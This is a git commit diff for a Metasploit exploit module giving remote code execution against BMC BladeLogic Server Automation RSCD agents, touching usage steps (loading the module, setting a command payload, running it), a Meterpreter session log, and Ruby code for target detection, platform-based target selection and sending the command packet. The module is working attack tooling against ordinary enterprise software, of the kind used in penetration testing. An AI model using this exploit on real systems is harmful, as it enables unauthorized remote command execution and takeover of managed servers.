Tidied up platform detection, check method, and minor typos.
parent
6568d29b67
commit
333ee893d3
|
@ -19,8 +19,8 @@ To use this exploit you will need access to BMC BladeLogic Server Automation.
|
|||
4. Load the module `use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce`.
|
||||
5. Select the generic command target `set target 3`.
|
||||
6. Select a generic command payload `set payload cmd/unix/generic` or `set payload cmd/windows/generic`.
|
||||
6. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`.
|
||||
7. Run the exploit `exploit`.
|
||||
7. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`.
|
||||
8. Run the exploit `exploit`.
|
||||
|
||||
The result should be that the string `MSF` is returned and output.
|
||||
|
||||
|
@ -63,7 +63,7 @@ This module target provides support for command staging to enable arbitrary Meta
|
|||
[*] Meterpreter session 1 opened (172.31.58.107:4444 -> 34.239.181.84:56233) at 2018-01-14 00:54:49 +0000
|
||||
|
||||
### Target 2: Unix/Linux
|
||||
This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same was as target 1.
|
||||
This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same way as target 1.
|
||||
|
||||
### Target 3: Generic Cmd
|
||||
This target can be used with *cmd* payloads to execute operating system commands against the target host.
|
||||
|
|
|
@ -78,31 +78,30 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
# Send agentinfo request and check result
|
||||
print_status('Checking for BMC with agentinfo request.')
|
||||
vprint_status('Checking for BMC with agentinfo request.')
|
||||
res = send_agentinfo_request
|
||||
if res && !res.empty && res.start_with?('Response: ')
|
||||
# Check for length field in response packet
|
||||
res_pkt = res[10..res.length]
|
||||
if res_pkt.length > 3
|
||||
length_field = res_pkt[0..3].unpack('N')[0]
|
||||
if res_pkt.length - length_field == 4
|
||||
# Response packet appears to be in the correct format
|
||||
print_warning('Unexpected agentinto response. Enable verbose ' \
|
||||
'output for actual response.')
|
||||
vprint_warning(res)
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
# The response wasn't in the expected format, probably not BMC RSCD
|
||||
print_error('The target does not appear to be a BMC RSCD agent.')
|
||||
vprint_error(res)
|
||||
return Exploit::CheckCode::Safe
|
||||
else
|
||||
# BMC detected, print platform and return
|
||||
print_good('BMC RSCD agent detected, platform appears to be ' + res)
|
||||
return Exploit::CheckCode::Detected
|
||||
# Check for successful platform detection
|
||||
if res[0] == 1
|
||||
vprint_good('BMC RSCD agent detected, platform appears to be ' + res[1])
|
||||
return CheckCode::Detected
|
||||
end
|
||||
|
||||
# Get first four bytes of the packet which should hold the content length
|
||||
res_len = res[1] && res[1].length > 3 ? res[1][0..3].unpack('N')[0] : 0
|
||||
|
||||
# Return unknown if the packet format appears correct (length field check)
|
||||
if res[1] && res[1].length - 4 == res_len
|
||||
vprint_warning('Target appears to be BMC, however an unexpected ' \
|
||||
'agentinfo response was returned.')
|
||||
vprint_warning('Response: ' + res[1])
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
||||
# Invalid response, probably not a BMC RSCD target
|
||||
vprint_error('The target does not appear to be a BMC RSCD agent.')
|
||||
vprint_error('Response: ' + res[1]) if res[1]
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -113,7 +112,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# Attempt to detect the target platform
|
||||
vprint_status('Detecting remote platform for auto target selection.')
|
||||
platform = send_agentinfo_request
|
||||
target_name = if platform.downcase.include?('windows')
|
||||
|
||||
# Fail if platform detection was unsuccessful
|
||||
if platform[0].zero?
|
||||
fail_with(Failure::UnexpectedReply, 'Unexpected response while ' \
|
||||
'detecting target platform.')
|
||||
end
|
||||
|
||||
# Set target based on returned platform
|
||||
target_name = if platform[1].downcase.include?('windows')
|
||||
'Windows/VBS Stager'
|
||||
else
|
||||
'Unix/Linux'
|
||||
|
@ -159,7 +166,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# Generate and send the payload
|
||||
vprint_status('Sending command to execute.')
|
||||
vprint_status('Command: ' + command)
|
||||
sock.put(generate_cmd_pkt(command))
|
||||
|
||||
# Finish the nexec request
|
||||
|
@ -208,9 +214,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
res = sock.get_once
|
||||
disconnect
|
||||
|
||||
# Extract platform from response
|
||||
return res.split(';')[4] if res && res.split(';').length > 6
|
||||
'Response: ' + res
|
||||
# Return the platform field from the response if it looks valid
|
||||
res_len = res.length > 3 ? res[0..3].unpack('N')[0] : 0
|
||||
return [1, res.split(';')[4]] if res &&
|
||||
res.split(';').length > 6 &&
|
||||
res.length == (res_len + 4)
|
||||
|
||||
# Invalid or unexpected response format, return the complete response
|
||||
[0, res]
|
||||
end
|
||||
|
||||
# Connect to the target and upgrade to an encrypted connection
|
||||
|
|
Loading…
Reference in New Issue